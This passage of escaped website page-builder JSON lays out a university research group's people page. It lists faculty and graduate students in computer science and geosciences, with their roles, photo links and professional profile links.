Professor<br><\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c58\",\"index\":1,\"id\":\"182-c62\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/geosciences.gsu.edu\\/profile\\/hassan-babaie\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.researchgate.net\\/profile\\/Hassan-Babaie\\/4\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c58\",\"index\":1,\"id\":\"182-c63\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c64\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c64\",\"index\":0,\"id\":\"182-c65\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-cropped-Faris-e1697216253732.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1814,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c64\",\"index\":0,\"id\":\"182-c66\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Faris Hawamdeh<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c64\",\"index\":2,\"id\":\"182-c67\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Academic Professional<br><\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c64\",\"index\":1,\"id\":\"182-c68\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/faris-hawamdeh\\/?trk=public_profile_publication_contributor-image\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/faris-hawamdeh\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.researchgate.net\\/profile\\/Faris-Hawamdeh\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c64\",\"index\":1,\"id\":\"182-c69\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"}],\"id\":\"182-c3\",\"parentId\":\"182-c2\",\"partialId\":182,\"styleRef\":971,\"type\":\"content\"}],\"id\":\"182-c2\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Faculty\"},\"id\":\"182-c72\",\"parentId\":\"182-c71\",\"partialId\":182,\"styleRef\":986,\"type\":\"content\"}],\"id\":\"182-c71\",\"parentId\":\"182-c70\",\"partialId\":182,\"styleRef\":985,\"type\":\"content\"}],\"id\":\"182-c70\",\"parentId\":\"182-c2\",\"partialId\":182,\"styleRef\":984,\"type\":\"content\"}]},\"styleRef\":970,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Grads\",\"attrs\":{\"id\":\"grads\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c75\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c75\",\"index\":0,\"id\":\"182-c76\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-cropped-cropped-282038166_2492815234187345_4129762528023780269_n-e1697205710763.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1742,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c75\",\"index\":0,\"id\":\"182-c77\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sundos Al Subhi<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c75\",\"index\":2,\"id\":\"182-c78\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c75\",\"index\":3,\"id\":\"182-c79\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sundos-al-subhi-88bb97150\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c75\",\"index\":1,\"id\":\"182-c80\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c81\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c81\",\"index\":0,\"id\":\"182-c82\",\"partialId\":182,\"styleRef\":849,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/06\\/cropped-cropped-cropped-IMG_1240-scaled-1-e1697205818731.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1744,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c81\",\"index\":0,\"id\":\"182-c83\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Aaja Christie<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c81\",\"index\":2,\"id\":\"182-c84\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c81\",\"index\":3,\"id\":\"182-c85\",\"partialId\":182,\"styleRef\":901,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/aaja-christie-17573657\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c81\",\"index\":1,\"id\":\"182-c86\",\"partialId\":182,\"styleRef\":853,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c87\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c87\",\"index\":0,\"id\":\"182-c88\",\"partialId\":182,\"styleRef\":856,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-cropped-Emma-e1697205932363.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1745,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c87\",\"index\":0,\"id\":\"182-c89\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Emma McDaniel<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c87\",\"index\":2,\"id\":\"182-c90\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"styleRef\":852,\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"parentId\":\"182-c87\",\"index\":1,\"id\":\"182-c91\",\"partialId\":182,\"type\":\"content\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/emmamcdaniel\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=Cwt8OwkAAAAJ&hl=en\"},\"name\":\"socicon\\/googlescholar\"}]},\"parentId\":\"182-c87\",\"index\":1,\"id\":\"182-c92\",\"partialId\":182,\"styleRef\":857,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c93\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c93\",\"index\":0,\"id\":\"182-c94\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-cropped-sara-edwards1-e1697206932891.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1754,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c93\",\"index\":0,\"id\":\"182-c95\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sara Edwards<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c93\",\"index\":2,\"id\":\"182-c96\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Student, MS Graduate<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c93\",\"index\":3,\"id\":\"182-c97\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sara-edwards-691b8331\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c93\",\"index\":1,\"id\":\"182-c98\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c99\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c99\",\"index\":0,\"id\":\"182-c100\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-cropped-cropped-cropped-Ryan-e1697207029774.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1756,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c99\",\"index\":0,\"id\":\"182-c101\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Ryan Garland<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c99\",\"index\":2,\"id\":\"182-c102\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Student, MS Graduate<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c99\",\"index\":3,\"id\":\"182-c103\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/ryan-g-aa71a0163\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c99\",\"index\":1,\"id\":\"182-c104\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c105\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c105\",\"index\":0,\"id\":\"182-c106\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-cropped-cropped-Jean-e1697206801281.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1750,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c105\",\"index\":0,\"id\":\"182-c107\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Jean Guo\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c105\",\"index\":2,\"id\":\"182-c108\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Student<\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c105\",\"index\":3,\"id\":\"182-c109\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c110\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c110\",\"index\":0,\"id\":\"182-c111\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-cropped-anupam-e1697206626249.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1747,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c110\",\"index\":0,\"id\":\"182-c112\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Anupam Sarker<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c110\",\"index\":2,\"id\":\"182-c113\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c110\",\"index\":3,\"id\":\"182-c114\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anupam-sarker-b164b412a\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c110\",\"index\":1,\"id\":\"182-c115\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c116\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c116\",\"index\":0,\"id\":\"182-c117\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-Ardavan-e1697206676649.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1748,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c116\",\"index\":0,\"id\":\"182-c118\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Ardavan Sassani\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c116\",\"index\":2,\"id\":\"182-c119\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Student, MS Graduate<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c116\",\"index\":3,\"id\":\"182-c120\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/ardavansassani\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=9KRgkCcAAAAJ&hl=en&oi=ao\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c116\",\"index\":1,\"id\":\"182-c121\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c122\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c122\",\"index\":0,\"id\":\"182-c123\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-Screen-Shot-2023-09-26-at-9.33.41-PM-e1697207183631.png\",\"caption\":{\"text\":\"\"},\"imageId\":1758,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c122\",\"index\":0,\"id\":\"182-c124\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sikiru Bayo Abdulkareem\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c122\",\"index\":2,\"id\":\"182-c125\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\\\">Master\'s Student<\\/span><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c122\",\"index\":3,\"id\":\"182-c126\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"www.linkedin.com\\/in\\/bayonle\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c122\",\"index\":1,\"id\":\"182-c127\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c128\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c128\",\"index\":0,\"id\":\"182-c129\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-Basit-e1697206890221.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1752,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c128\",\"index\":0,\"id\":\"182-c130\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Basit Damilare Amuda\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c128\",\"index\":2,\"id\":\"182-c131\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c128\",\"index\":3,\"id\":\"182-c132\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"http:\\/\\/linkedin.com\\/in\\/basit-amuda-227098238\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c128\",\"index\":1,\"id\":\"182-c133\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c140\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c140\",\"index\":0,\"id\":\"182-c141\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2024\\/11\\/Siv-photo.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1860,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c140\",\"index\":0,\"id\":\"182-c142\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sivgech Heang<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c140\",\"index\":2,\"id\":\"182-c143\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c140\",\"index\":3,\"id\":\"182-c144\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sivgech-heang-91842618a\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c140\",\"index\":1,\"id\":\"182-c145\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c134\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c134\",\"index\":0,\"id\":\"182-c135\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-cropped-md-shah-sayem-e1697207514119.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1761,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c134\",\"index\":0,\"id\":\"182-c136\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Shah Md Shahnewaz Sayem\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c134\",\"index\":2,\"id\":\"182-c137\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c134\",\"index\":3,\"id\":\"182-c138\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/shah-md-shahnewaz-sayem-767540154\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c134\",\"index\":1,\"id\":\"182-c139\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c228\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c228\",\"index\":0,\"id\":\"182-c229\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2024\\/11\\/Shreyatadipaneni.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1875,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c228\",\"index\":0,\"id\":\"182-c230\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Shreya Tadipaneni<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c228\",\"index\":2,\"id\":\"182-c231\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c228\",\"index\":3,\"id\":\"182-c232\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/shreya-tadipaneni-22a4451a6\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c228\",\"index\":1,\"id\":\"182-c233\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c234\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c234\",\"index\":0,\"id\":\"182-c235\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2024\\/11\\/Anshul-Gupta.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1876,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c234\",\"index\":0,\"id\":\"182-c236\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Anshul Gupta<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c234\",\"index\":2,\"id\":\"182-c237\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c234\",\"index\":3,\"id\":\"182-c238\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anshulgupta-panther\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c234\",\"index\":1,\"id\":\"182-c239\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"}],\"id\":\"182-c74\",\"parentId\":\"182-c73\",\"partialId\":182,\"styleRef\":847,\"type\":\"content\"}],\"id\":\"182-c73\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Graduates\"},\"id\":\"182-c148\",\"parentId\":\"182-c147\",\"partialId\":182,\"styleRef\":862,\"type\":\"content\"}],\"id\":\"182-c147\",\"parentId\":\"182-c146\",\"partialId\":182,\"styleRef\":861,\"type\":\"content\"}],\"id\":\"182-c146\",\"parentId\":\"182-c73\",\"partialId\":182,\"styleRef\":860,\"type\":\"content\"}]},\"styleRef\":846,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Undergrads\",\"attrs\":{\"id\":\"undergrads-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c151\",\"parentId\":\"182-c150\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c151\",\"index\":0,\"id\":\"182-c152\",\"partialId\":182,\"styleRef\":831,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\